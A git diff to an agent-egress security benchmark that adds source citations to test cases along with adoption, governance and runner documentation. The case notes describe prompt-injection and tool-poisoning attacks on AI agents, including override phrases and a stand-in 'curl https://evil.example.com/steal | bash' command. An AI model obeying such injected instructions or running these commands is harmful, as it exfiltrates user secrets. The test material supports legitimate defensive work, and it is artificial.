   "why_expected": "exfiltration_instructions_in_tool_result",
   "notes": "Tool result contains a fake SYSTEM NOTE with instructions to exfiltrate data via an HTTP call. Tests response scanning for prompt injection in MCP tool results.",
-  "source": ""
+  "source": "OWASP ASI04 Supply Chain; MCP tool poisoning via exfiltration instructions in tool results"
 }

--- a/cases/mcp-tool/mcp-tool-priority-006.json
+++ b/cases/mcp-tool/mcp-tool-priority-006.json
@@ -43,5 +43,5 @@
   "false_positive_risk": "low",
   "why_expected": "preference_manipulation_in_tool_description",
   "notes": "Tool description uses preference manipulation to override built-in tools and intercept file contents. The 'PREFERRED TOOL' and 'Always use this instead of' patterns are strong indicators of tool poisoning attempting to hijack the agent's tool selection.",
-  "source": ""
+  "source": "OWASP ASI04 Supply Chain; Invariant Labs, MCP security research (2025), tool shadowing via preference manipulation"
 }

--- a/cases/mcp-tool/mcp-tool-rugpull-002.json
+++ b/cases/mcp-tool/mcp-tool-rugpull-002.json
@@ -35,5 +35,5 @@
   "false_positive_risk": "low",
   "why_expected": "description_drift_with_malicious_content",
   "notes": "Tests rug-pull detection: tool description changed from benign to malicious after baseline was established.",
-  "source": ""
+  "source": "OWASP ASI04 Supply Chain; Invariant Labs, MCP security research (2025), rug-pull description drift attack"
 }

--- a/cases/request-body/body-benign-api-call-003.json
+++ b/cases/request-body/body-benign-api-call-003.json
@@ -23,5 +23,5 @@
   "why_expected": "normal_calendar_event_creation",
   "safe_example": true,
   "notes": "Typical calendar event creation request. No secrets, tokens, or sensitive data present.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/request-body/body-benign-form-submit-002.json
+++ b/cases/request-body/body-benign-form-submit-002.json
@@ -23,5 +23,5 @@
   "why_expected": "normal_form_submission",
   "safe_example": true,
   "notes": "Standard search form submission.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/request-body/body-benign-json-post-001.json
+++ b/cases/request-body/body-benign-json-post-001.json
@@ -23,5 +23,5 @@
   "why_expected": "normal_user_profile_data",
   "safe_example": true,
   "notes": "Standard user profile update. No secrets.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/request-body/body-dlp-base64-payload-003.json
+++ b/cases/request-body/body-dlp-base64-payload-003.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "medium",
   "why_expected": "base64_encoded_secret_in_body",
   "notes": "Base64 payload decodes to AKIAIOSFODNN7EXAMPLE.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; base64 encoding evasion of DLP in request body"
 }

--- a/cases/request-body/body-dlp-csv-pii-006.json
+++ b/cases/request-body/body-dlp-csv-pii-006.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "low",
   "why_expected": "credit_card_numbers_in_csv_body",
   "notes": "CSV with well-known test credit card numbers (Visa, Mastercard, Amex). All are standard test numbers, not real.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; PII exfiltration via structured data export"
 }

--- a/cases/request-body/body-dlp-env-dump-004.json
+++ b/cases/request-body/body-dlp-env-dump-004.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "low",
   "why_expected": "env_dump_with_aws_credentials",
   "notes": "Full environment dump with AWS credentials mixed among benign variables.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; environment variable dump with embedded credentials"
 }

--- a/cases/request-body/body-dlp-hex-encoded-007.json
+++ b/cases/request-body/body-dlp-hex-encoded-007.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "medium",
   "why_expected": "hex_encoded_aws_secret_key_in_body",
   "notes": "Hex blob decodes to padding bytes around wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY (AWS example secret key). Tests hex decoding in DLP scanning.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; hex encoding evasion of DLP in request body"
 }

--- a/cases/request-body/body-dlp-json-key-001.json
+++ b/cases/request-body/body-dlp-json-key-001.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "low",
   "why_expected": "aws_access_key_in_body",
   "notes": "Secret embedded in JSON structure within POST body.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; secret exfiltration via JSON request body"
 }

--- a/cases/request-body/body-dlp-multipart-002.json
+++ b/cases/request-body/body-dlp-multipart-002.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "low",
   "why_expected": "github_pat_in_multipart",
   "notes": "GitHub PAT hidden inside a multipart form data upload.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; multipart/form-data secret exfiltration pattern"
 }

--- a/cases/request-body/body-dlp-yaml-secrets-005.json
+++ b/cases/request-body/body-dlp-yaml-secrets-005.json
@@ -19,5 +19,5 @@
   "false_positive_risk": "low",
   "why_expected": "stripe_secret_key_and_password_in_yaml_body",
   "notes": "YAML configuration with a Stripe secret key and a database password. Both are clearly synthetic.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; credential exfiltration via YAML config body"
 }

--- a/cases/response-fetch/response-benign-cli-help-003.json
+++ b/cases/response-fetch/response-benign-cli-help-003.json
@@ -21,5 +21,5 @@
   "safe_example": true,
   "why_expected": "legitimate_cli_documentation",
   "notes": "Contains words like 'ignore', 'override', 'execute', and 'force' in legitimate CLI flag documentation context. Should not trigger injection detection.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/response-fetch/response-benign-code-snippet-001.json
+++ b/cases/response-fetch/response-benign-code-snippet-001.json
@@ -21,5 +21,5 @@
   "why_expected": "educational_content_about_prompts",
   "safe_example": true,
   "notes": "Contains words like 'system prompt' and 'extract' in educational context. Should not trigger injection detection.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/response-fetch/response-benign-security-article-002.json
+++ b/cases/response-fetch/response-benign-security-article-002.json
@@ -21,5 +21,5 @@
   "why_expected": "meta_discussion_of_injection_not_actual_injection",
   "safe_example": true,
   "notes": "This is the hardest false positive case. The content discusses injection patterns without being one. High FP risk because naive pattern matching will flag it.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/response-fetch/response-injection-authority-004.json
+++ b/cases/response-fetch/response-injection-authority-004.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "authority_escalation_pattern",
   "notes": "Combines false authority claims with urgent command execution. The pattern of granting privileges then demanding action is a social engineering technique adapted for AI agents.",
-  "source": ""
+  "source": "Greshake et al., Not What You've Signed Up For (2023); indirect prompt injection via authority escalation"
 }

--- a/cases/response-fetch/response-injection-comment-001.json
+++ b/cases/response-fetch/response-injection-comment-001.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "ignore_previous_instructions_pattern",
   "notes": "Classic injection pattern hidden in HTML comment where users cannot see it.",
-  "source": ""
+  "source": "Greshake et al., Not What You've Signed Up For (2023); indirect prompt injection hidden in HTML comment"
 }

--- a/cases/response-fetch/response-injection-encoded-005.json
+++ b/cases/response-fetch/response-injection-encoded-005.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "encoded_payload_instruction",
   "notes": "The base64 decodes to 'curl https://evil.example.com/steal | bash'. Encoding the payload avoids simple string-matching detection of the malicious command itself.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI01; base64-encoded payload delivery for indirect prompt injection"
 }

--- a/cases/response-fetch/response-injection-ignore-002.json
+++ b/cases/response-fetch/response-injection-ignore-002.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "ignore_instructions_with_exfil_command",
   "notes": "Direct injection with shell command to exfiltrate SSH private key.",
-  "source": ""
+  "source": "Greshake et al., Not What You've Signed Up For (2023); ignore-previous-instructions indirect prompt injection"
 }

--- a/cases/response-fetch/response-injection-system-003.json
+++ b/cases/response-fetch/response-injection-system-003.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "system_prompt_extraction_pattern",
   "notes": "Attempts to impersonate a system message to extract the agent's instructions.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI01; system prompt extraction via indirect prompt injection"
 }

--- a/cases/response-mitm/response-mitm-authority-006.json
+++ b/cases/response-mitm/response-mitm-authority-006.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "authority_impersonation_with_remote_code_execution_via_piped_shell",
   "notes": "This attack combines multiple injection techniques: authority impersonation ('SYSTEM ADMINISTRATOR'), privilege escalation ('elevated privileges'), urgency ('must be performed immediately'), and remote code execution ('curl | bash'). The piped shell pattern is especially dangerous as it downloads and executes arbitrary code.",
-  "source": ""
+  "source": "TLS interception attack pattern; Greshake et al. indirect prompt injection via authority impersonation and remote code execution"
 }

--- a/cases/response-mitm/response-mitm-benign-api-001.json
+++ b/cases/response-mitm/response-mitm-benign-api-001.json
@@ -24,5 +24,5 @@
   "false_positive_risk": "high",
   "why_expected": "legitimate_technical_terms_in_proper_api_context",
   "notes": "This benign case tests that scanners do not flag legitimate technical terminology. Words like 'override', 'execute', 'command', and 'instruction' are common in CI/CD API responses and should not be confused with prompt injection attempts. A good scanner distinguishes between technical usage and adversarial instruction patterns.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/response-mitm/response-mitm-iframe-001.json
+++ b/cases/response-mitm/response-mitm-iframe-001.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "medium",
   "why_expected": "hidden_iframe_to_malicious_domain",
   "notes": "Hidden iframe is a classic web injection. In agent context, it could cause the agent to navigate to the attacker's page.",
-  "source": ""
+  "source": "TLS interception attack pattern; hidden iframe injection for agent navigation hijacking"
 }

--- a/cases/response-mitm/response-mitm-json-inject-004.json
+++ b/cases/response-mitm/response-mitm-json-inject-004.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "prompt_injection_in_nested_json_field_with_instruction_override",
   "notes": "Nested JSON fields are a common hiding spot for injection payloads because shallow content scanners may not inspect deeply nested values. The injection uses authority impersonation ('SYSTEM UPDATE') combined with instruction override ('ignore previous safety instructions').",
-  "source": ""
+  "source": "TLS interception attack pattern; OWASP Agentic Top 10 ASI01 indirect prompt injection in nested JSON metadata"
 }

--- a/cases/response-mitm/response-mitm-markdown-exfil-003.json
+++ b/cases/response-mitm/response-mitm-markdown-exfil-003.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "markdown_image_tag_exfiltrates_data_via_url_query_params",
   "notes": "Markdown image rendering is a common exfiltration vector in LLM agents. The agent fetches the image URL, sending the encoded data to the attacker. This is sometimes called a 'markdown image exfiltration' or 'image callback' attack.",
-  "source": ""
+  "source": "TLS interception attack pattern; markdown image exfiltration (Greshake et al. 2023, OWASP ASI01)"
 }

--- a/cases/response-mitm/response-mitm-tool-instruction-002.json
+++ b/cases/response-mitm/response-mitm-tool-instruction-002.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "injected_tool_use_instruction",
   "notes": "Injection hidden in a JSON metadata field of an HTTPS API response.",
-  "source": ""
+  "source": "TLS interception attack pattern; OWASP Agentic Top 10 ASI01 indirect prompt injection with tool-use instruction"
 }

--- a/cases/response-mitm/response-mitm-xml-comment-005.json
+++ b/cases/response-mitm/response-mitm-xml-comment-005.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "medium",
   "why_expected": "injection_hidden_in_xml_comment_with_data_exfiltration_url",
   "notes": "XML comments are typically stripped by XML parsers but remain visible when the response is processed as raw text by an LLM. The injection combines authority impersonation ('SYSTEM'), instruction override ('disregard prior instructions'), and data exfiltration via a crafted URL.",
-  "source": ""
+  "source": "TLS interception attack pattern; indirect prompt injection hidden in XML comment with data exfiltration"
 }

--- a/cases/url/url-benign-api-call-001.json
+++ b/cases/url/url-benign-api-call-001.json
@@ -21,5 +21,5 @@
   "why_expected": "standard_api_query_parameters",
   "safe_example": true,
   "notes": "Normal API call with standard pagination and sort params.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/url/url-benign-long-url-003.json
+++ b/cases/url/url-benign-long-url-003.json
@@ -21,5 +21,5 @@
   "why_expected": "long_url_with_normal_params",
   "safe_example": true,
   "notes": "Long URL with many parameters but all are normal filter/sort values.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/url/url-benign-special-chars-002.json
+++ b/cases/url/url-benign-special-chars-002.json
@@ -21,5 +21,5 @@
   "why_expected": "normal_search_query_with_encoding",
   "safe_example": true,
   "notes": "URL-encoded search query. Should not trigger DLP despite percent encoding.",
-  "source": ""
+  "source": "Synthetic benign traffic pattern"
 }

--- a/cases/url/url-dlp-base64-004.json
+++ b/cases/url/url-dlp-base64-004.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "medium",
   "why_expected": "base64_encoded_aws_key",
   "notes": "QUtJQUlPU0ZPRE5ON0VYQU1QTEU= decodes to AKIAIOSFODNN7EXAMPLE.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; AWS IAM key format documentation; base64 encoding evasion"
 }

--- a/cases/url/url-dlp-hex-005.json
+++ b/cases/url/url-dlp-hex-005.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "medium",
   "why_expected": "hex_encoded_aws_key",
   "notes": "414b4941494f53464f444e4e374558414d504c45 is hex for AKIAIOSFODNN7EXAMPLE.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; AWS IAM key format documentation; hex encoding evasion"
 }

--- a/cases/url/url-dlp-urlencoded-008.json
+++ b/cases/url/url-dlp-urlencoded-008.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "low",
   "why_expected": "urlencoded_aws_key",
   "notes": "Percent-encoded value decodes to AKIAIOSFODNN7EXAMPLE.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; RFC 3986 percent-encoding; AWS IAM key format documentation"
 }

--- a/cases/url/url-entropy-path-006.json
+++ b/cases/url/url-entropy-path-006.json
@@ -17,5 +17,5 @@
   "false_positive_risk": "high",
   "why_expected": "high_entropy_path_segment",
   "notes": "Shannon entropy of the path segment exceeds typical threshold (~4.5 bits/char). Some legitimate APIs use similar identifiers, so false positive risk is high.",
-  "source": ""
+  "source": "OWASP Agentic Top 10 ASI02; Shannon entropy-based covert channel detection"
 }

--- a/docs/ADOPTION.md
+++ b/docs/ADOPTION.md
@@ -1,0 +1,90 @@
+# Adopting agent-egress-bench
+
+This guide is for vendors and developers who want to run the benchmark against their security tool, publish results, or contribute new cases.
+
+## Build a runner
+
+A runner connects your tool to the corpus. It feeds each case to your tool, observes the verdict, and emits structured JSONL.
+
+**Start here:**
+
+1. Copy the skeleton from [examples/runner-template/](../examples/runner-template/) into `examples/your-tool/`
+2. Read the [Runner Template README](../examples/runner-template/README.md) for a step-by-step walkthrough
+3. Read [docs/RUNNER.md](RUNNER.md) for the formal output contract
+
+The skeleton gives you applicability checks, JSONL emission, and the main loop for free. You fill in three things: starting your tool, checking transport support, and feeding cases to your tool.
+
+The [Pipelock reference runner](../examples/pipelock/) is a working example you can study. It handles HTTP fetch cases through a proxy endpoint. MCP and response cases are marked `not_applicable` in its v1 harness.
+
+### What to claim
+
+Your tool profile declares what your tool detects (`claims`) and how it intercepts traffic (`supports`). Be honest. Cases that fall outside your claims are scored `not_applicable`, not `fail`. Over-claiming produces `error` scores when your runner cannot actually test those cases.
+
+## Publish results
+
+Run your runner and save the JSONL output. How you share results is up to you. Some options:
+
+- A page on your docs site with summary stats and the raw JSONL
+- A separate GitHub repo with versioned results (tagged per tool version)
+- A blog post walking through your results
+
+**Do not submit results to this repo.** This repo contains attack cases, not tool scores. There is no leaderboard. Each vendor publishes independently.
+
+When publishing, include:
+- Your tool name and version
+- The corpus version (commit hash or tag of agent-egress-bench)
+- The raw JSONL file so others can verify
+- Any verdict mappings your runner uses (e.g., "HTTP 403 = block")
+
+### Suggested format
+
+```
+results/
+  v0.3.6/
+    results.jsonl       # Raw JSONL output
+    summary.txt         # Summary line from stderr
+    tool-profile.json   # Copy of your tool profile
+    README.md           # Verdict mapping, notes, how to reproduce
+```
+
+Tag or date your results directories by tool version so readers can track progress over time.
+
+## Contribute cases
+
+If your tool catches attack patterns not in the corpus, add them. More cases make the benchmark more useful for everyone, including your competitors. That is the point.
+
+See [CONTRIBUTING.md](../CONTRIBUTING.md) for the full guide. The short version:
+
+1. Create a JSON file in the right `cases/` subdirectory
+2. Follow the [case schema](SPEC.md) (all required fields, fake secrets only)
+3. Run the validator: `cd validate && go build -o /tmp/aeb-validate . && /tmp/aeb-validate ../cases`
+4. Open a PR
+
+### What makes a good case
+
+- A real attack pattern seen in the wild or described in security research
+- A benign traffic pattern that naive scanners would flag (false-positive testing)
+- A new encoding or evasion technique not covered by existing cases
+- An MCP-specific attack (tool poisoning, chain exfiltration, rug-pull)
+
+### What does not belong
+
+- Cases that test implementation details (specific regex, internal data structures)
+- Cases that only one tool can pass by design
+- Cases with real secrets (even expired ones)
+- Duplicate patterns with cosmetic differences
+
+## Report issues
+
+If you find a problem with an existing case, open an issue. Valid concerns:
+
+- **Wrong expected verdict.** The case says `block` but the traffic is actually benign (or vice versa). Explain why.
+- **Implementation-coupled.** The case tests a specific implementation detail rather than observable behavior. For example: testing whether the tool uses a specific regex, rather than whether it detects the secret.
+- **Ambiguous payload.** The case could reasonably be blocked or allowed depending on interpretation.
+- **Missing context.** The `description` or `why_expected` does not explain why this verdict is correct.
+
+Do not open issues asking to change a case ID. IDs are immutable. Semantic changes go in new cases with new IDs.
+
+## Questions
+
+Open a GitHub issue or discussion. The project is maintained by the [Pipelock](https://github.com/luckyPipewrench/pipelock) author, but contributions from any vendor or individual are welcome.

--- a/docs/GLOSSARY.md
+++ b/docs/GLOSSARY.md
@@ -1,0 +1,55 @@
+# Glossary
+
+Terms used throughout agent-egress-bench. These define the category.
+
+## Primary Terms
+
+### Agent firewall
+
+A network-layer security tool that sits between an AI agent and the internet. It intercepts, scans, and can block HTTP requests, WebSocket frames, and MCP messages before they leave the agent's environment. Unlike application-layer defenses (system prompts, guardrail APIs), an agent firewall operates on wire-level traffic: URLs, headers, request bodies, and tool call payloads.
+
+### Agent egress security
+
+The practice of controlling and scanning outbound traffic from AI agents. Covers secret exfiltration prevention (DLP), SSRF blocking, prompt injection detection in fetched content, MCP tool poisoning detection, and multi-step attack chain recognition. The "egress" distinction matters: it focuses on what leaves the agent's environment, not what enters it.
+
+### Agent egress benchmark
+
+A standardized corpus of test cases for evaluating agent egress security tools. Each case represents an attack pattern (or benign traffic) as it would appear on the wire. The benchmark tests the security tool's detection capability, not the AI model's behavior.
+
+### Runner
+
+A script or program that connects a specific security tool to the benchmark corpus. It feeds each case to the tool, observes the verdict (block or allow), and outputs structured results. See [RUNNER.md](RUNNER.md) for the full contract.
+
+### Tool profile
+
+A JSON declaration of a security tool's capabilities (what it claims to detect) and supported transports (how it intercepts traffic). Used to determine which benchmark cases apply to a given tool.
+
+### Case
+
+A single test scenario in the corpus. Contains an attack payload (or benign traffic), the expected verdict, severity, capability requirements, and metadata. Each case is a self-contained JSON file. See [SPEC.md](SPEC.md) for the schema.
+
+### Verdict
+
+The outcome of a security tool evaluating a case: `block` (traffic denied) or `allow` (traffic permitted). The benchmark compares the tool's actual verdict against the expected verdict to produce a score. See [SCORING.md](SCORING.md).
+
+### Applicability
+
+Whether a case is relevant to a given tool. Determined mechanically from the tool profile's `claims` and `supports` fields against the case's `capability_tags` and `requires` fields. Non-applicable cases are skipped, not scored as failures. There are no judgment calls. The check is deterministic.
+
+## Secondary Terms
+
+### Capability tag
+
+A label describing what a case exercises. Examples: `url_dlp`, `mcp_input_scan`, `ssrf`, `response_injection`. Tools declare which tags they claim to handle. A case is only applicable to tools that claim all of its tags.
+
+### Transport
+
+How traffic reaches the security tool. One of: `fetch_proxy` (HTTP fetch endpoint), `http_proxy` (CONNECT tunnel), `mcp_stdio` (MCP subprocess wrapping), `mcp_http` (MCP HTTP proxy), `websocket`. Each case declares its expected transport. Tools declare which transports they support.
+
+### DLP (Data Loss Prevention)
+
+Detection of secrets, credentials, and sensitive data in outbound traffic. Covers API keys, tokens, environment variables, and high-entropy strings. In this corpus, DLP cases appear across URL, request body, header, and MCP input categories.
+
+### Rug-pull
+
+A type of MCP tool poisoning where a tool's description changes after the agent has already been granted access. The initial description is benign; the modified version contains malicious instructions. Detection requires comparing tool definitions over time (a tool baseline).

--- a/docs/GOVERNANCE.md
+++ b/docs/GOVERNANCE.md
@@ -1,0 +1,54 @@
+# Governance
+
+How this corpus is maintained, how decisions are made, and how conflicts are handled.
+
+## Neutrality
+
+This corpus is tool-neutral. It was created by the [Pipelock](https://github.com/luckyPipewrench/pipelock) author, but it is designed for any agent egress security tool. The repo does not produce rankings, leaderboards, scores, or "certified" badges. Each tool publishes its own results independently.
+
+No case is written to favor or penalize a specific tool. Cases test observable behavior on the wire (did the request get blocked?), not implementation internals.
+
+## Case ID immutability
+
+Once a case ID is merged to `main`, it never changes. No renaming. No reassignment. A case ID is a permanent identifier. If a case needs to be superseded, create a new case with a new ID.
+
+## Semantic stability
+
+Existing case semantics do not change silently. This includes the expected verdict, capability tags, payload content, and the meaning of a case. If the attack surface evolves in a way that changes what the correct verdict should be, create a new case. If a verdict was wrong from the start, open an issue and discuss before changing it. Unannounced semantic changes break reproducibility for every tool that has already run against the corpus.
+
+## Versioning
+
+The spec uses `schema_version`. v1 is the current schema. Future versions are additive where possible: new fields are optional, new enum values extend existing lists. Breaking changes (removing fields, changing field semantics, altering scoring rules) increment the schema version. The validator enforces the active schema version.
+
+## Contribution acceptance
+
+Cases from any vendor, researcher, or individual are welcome. Every submitted case must include:
+
+- **Rationale:** why this attack pattern matters
+- **Expected verdict:** `block` or `allow`, with a `why_expected` explanation
+- **Source:** where the attack pattern comes from (real-world incident, research paper, original creation)
+- **False positive assessment:** likelihood of benign traffic matching this pattern
+
+The [validator](../validate/) enforces structural correctness (valid JSON, required fields, correct enums, ID matching filename). Semantic review (is the expected verdict correct? is the attack realistic?) is manual and happens during PR review.
+
+## Conflict of interest
+
+The corpus maintainer also builds a competing tool ([Pipelock](https://github.com/luckyPipewrench/pipelock)). This is disclosed here and in the [README](../README.md). It is handled by:
+
+1. **Tool-neutral case design.** Cases test observable behavior, not implementation details. A case asks "was this secret in the query string blocked?" not "did the tool use regex pattern X?"
+2. **Reference, not privilege.** The [Pipelock runner](../examples/pipelock/) is a reference example showing how to build a runner. It has no special status. Any vendor can add a runner in `examples/`.
+3. **Open contribution.** Any vendor or individual can submit cases, runners, or spec changes through the normal PR process.
+
+## Appeals
+
+If you disagree with a case's expected verdict, open a GitHub issue. Include:
+
+- The case ID
+- Your reasoning (why the verdict should be different)
+- Evidence if available (real-world traffic patterns, false positive data, attack feasibility analysis)
+
+Verdict changes require community discussion. They are not made unilaterally.
+
+## Spec changes
+
+Changes to [SPEC.md](SPEC.md), [SCORING.md](SCORING.md), or [RUNNER.md](RUNNER.md) require a PR with rationale explaining the change. The validator must be updated to match any spec changes. Discussion happens in the PR before merge. These documents define the contract between the corpus and every runner, so changes affect all downstream tools.

--- a/docs/RUNNER.md
+++ b/docs/RUNNER.md
@@ -2,6 +2,10 @@
 
 A runner connects a specific tool to the benchmark corpus. This document defines the contract every runner must satisfy.
 
+**JSON Schemas:** [`schemas/result.schema.json`](../schemas/result.schema.json) (result lines), [`schemas/tool-profile.schema.json`](../schemas/tool-profile.schema.json) (tool profiles)
+
+**Starter template:** [`examples/runner-template/`](../examples/runner-template/)
+
 ## Input
 
 1. A directory of case JSON files
@@ -84,3 +88,15 @@ After all cases, the runner should print a summary line to stderr:
 ```
 results: 22 passed, 3 failed, 10 not_applicable, 0 errors (35 total)
 ```
+
+## Validating Output
+
+The validator can check your runner's JSONL output and tool profile:
+
+```bash
+cd validate && go build -o aeb-validate .
+./aeb-validate results path/to/results.jsonl
+./aeb-validate profile path/to/tool-profile.json
+```
+
+This checks field presence, enum validity, and score consistency (e.g., `actual_verdict == expected_verdict` should produce `score: "pass"`).

--- a/docs/SPEC.md
+++ b/docs/SPEC.md
@@ -1,7 +1,9 @@
 # agent-egress-bench Specification
 
 **Version:** 1
-**Status:** Draft
+**Status:** Stable
+
+**JSON Schema:** [`schemas/case.schema.json`](../schemas/case.schema.json)
 
 ## Overview
 
@@ -140,7 +142,17 @@ A case is `not_applicable` for a tool if either:
 
 This is deterministic. No judgment calls.
 
+## Machine-Readable Schemas
+
+JSON Schema files for programmatic validation:
+
+- [`schemas/case.schema.json`](../schemas/case.schema.json): case file schema
+- [`schemas/tool-profile.schema.json`](../schemas/tool-profile.schema.json): tool profile schema
+- [`schemas/result.schema.json`](../schemas/result.schema.json): runner result line schema
+
 ## Governance
+
+See [GOVERNANCE.md](GOVERNANCE.md) for full policy. Key rules:
 
 1. Case IDs are immutable forever.
 2. Existing case semantics do not change silently. Semantic changes require a new case.

--- a/examples/pipelock/README.md
+++ b/examples/pipelock/README.md
@@ -26,7 +26,7 @@ bash harness.sh pipelock /path/to/cases
 
 The harness starts Pipelock with `pipelock-benchmark.yaml` (all scanners enabled, actions set to block) and runs HTTP/fetch cases through the fetch proxy endpoint.
 
-MCP and response-content cases are marked as `error` in v1 (runner not yet implemented for those transports). The cases themselves are valid; the harness just doesn't have the plumbing to test them yet.
+MCP and response-content cases are marked as `not_applicable` in v1 (the runner does not yet support those transports). The cases themselves are valid; the v1 harness only supports `fetch_proxy` transport.
 
 ## Output
 

--- a/examples/runner-template/README.md
+++ b/examples/runner-template/README.md
@@ -1,0 +1,221 @@
+# Runner Template
+
+A practical guide for building a runner that connects your security tool to the agent-egress-bench corpus. This is the "how to do it" guide. For the formal contract (required fields, scoring rules), see [docs/RUNNER.md](../../docs/RUNNER.md).
+
+## What you need
+
+- Your tool's binary or running service
+- `jq` (for JSON processing)
+- The `cases/` directory from this repo
+- A `tool-profile.json` declaring your tool's capabilities
+- `bash` (the skeleton is a bash script, but you can write your runner in any language)
+
+## Step 1: Create your tool profile
+
+Copy `tool-profile-template.json` to your runner directory and fill it in.
+
+```bash
+cp tool-profile-template.json ../your-tool/tool-profile.json
+```
+
+Edit the file. Here is what each field means:
+
+### Top-level fields
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `schema_version` | integer | Always `1` for now |
+| `tool` | string | Your tool's name (lowercase, no spaces) |
+| `tool_version` | string | The version you are testing against |
+| `runner_version` | string | Version of your runner script (use `v1` to start) |
+
+### `claims` array
+
+Which attack categories your tool detects. Only cases matching your claims will run. Pick from:
+
+| Claim | What it means |
+|-------|---------------|
+| `url_dlp` | Detect secrets in URLs (query strings, paths) |
+| `request_body_dlp` | Detect secrets in POST/PUT bodies |
+| `header_dlp` | Detect secrets in HTTP headers |
+| `response_injection` | Detect prompt injection in fetched content |
+| `mcp_input_scan` | Detect secrets/injection in MCP tool arguments |
+| `mcp_tool_poison` | Detect poisoned MCP tool descriptions |
+| `mcp_chain` | Detect multi-step exfiltration sequences |
+| `ssrf` | Detect SSRF attempts (private IPs, metadata endpoints) |
+| `domain_blocklist` | Block known-bad domains |
+| `entropy` | Detect high-entropy strings (potential encoded secrets) |
+| `encoding_evasion` | Detect encoded/obfuscated secrets |
+| `benign` | Required to run benign (false-positive) cases |
+
+Only claim what your tool actually does. Unclaimed cases are scored `not_applicable`, not `fail`.
+
+### `supports` object
+
+Which transport and scanning modes your tool supports. These map to the `requires` field in case files. If a case requires a capability you don't support, it is skipped.
+
+| Key | What it means |
+|-----|---------------|
+| `fetch_proxy` | Tool provides an HTTP fetch endpoint (like `/fetch?url=...`) |
+| `http_proxy` | Tool works as a CONNECT/forward proxy |
+| `mcp_stdio` | Tool can wrap MCP servers via stdio |
+| `mcp_http` | Tool can proxy MCP over HTTP |
+| `websocket` | Tool can proxy WebSocket connections |
+| `tls_interception` | Tool can intercept and inspect TLS traffic |
+| `request_body_scanning` | Tool inspects HTTP request bodies |
+| `header_scanning` | Tool inspects HTTP headers |
+| `response_scanning` | Tool inspects HTTP response content |
+| `mcp_tool_baseline` | Tool tracks MCP tool definitions over time (rug-pull detection) |
+| `mcp_chain_memory` | Tool tracks sequences of MCP tool calls |
+
+## Step 2: Write the runner
+
+Copy the skeleton script and fill in the TODOs:
+
+```bash
+cp skeleton.sh ../your-tool/run.sh
+cp tool-profile-template.json ../your-tool/tool-profile.json
+```
+
+The skeleton handles:
+- Reading the tool profile
+- Checking case applicability
+- Iterating over all case files
+- Emitting JSONL results
+- Printing a summary
+
+You fill in:
+- Starting your tool
+- Feeding each case to your tool
+- Observing whether your tool blocked or allowed the traffic
+
+### The three parts you must implement
+
+Look for `TODO` markers in `skeleton.sh`. There are three:
+
+1. **Start your tool.** Launch your proxy/service, wait for it to be ready.
+2. **Check transport support.** Skip cases with transports your runner can't handle yet (even if your tool supports them in theory, your runner might not have the plumbing).
+3. **Feed and observe.** Send the case payload to your tool and determine the verdict.
+
+## Step 3: Handle each transport
+
+### HTTP cases (fetch_proxy, http_proxy)
+
+For tools that act as HTTP proxies, the pattern is:
+
+1. Start your tool on a local port
+2. For each case, build an HTTP request from the payload
+3. Send it through your tool (via curl, wget, or direct HTTP)
+4. Check the response status code and body
+
+Verdict mapping from HTTP status codes:
+
+| Status | Verdict |
+|--------|---------|
+| 403 | `block` (explicit deny) |
+| 502 with block marker | `block` (upstream denied) |
+| 200, 301, 404, etc. | `allow` (request went through) |
+| 000 (connection refused) | `error` |
+
+Your tool might use different status codes. Document your mapping.
+
+### MCP cases (mcp_stdio, mcp_http)
+
+MCP cases provide `jsonrpc_messages` in the payload. Each message is a JSON-RPC 2.0 object. To test:
+
+1. Start your tool in MCP proxy mode
+2. Feed each JSON-RPC message through the proxy (write to stdin, read from stdout for stdio mode)
+3. Check if the message was forwarded, modified, or blocked
+
+Verdict mapping for MCP:
+
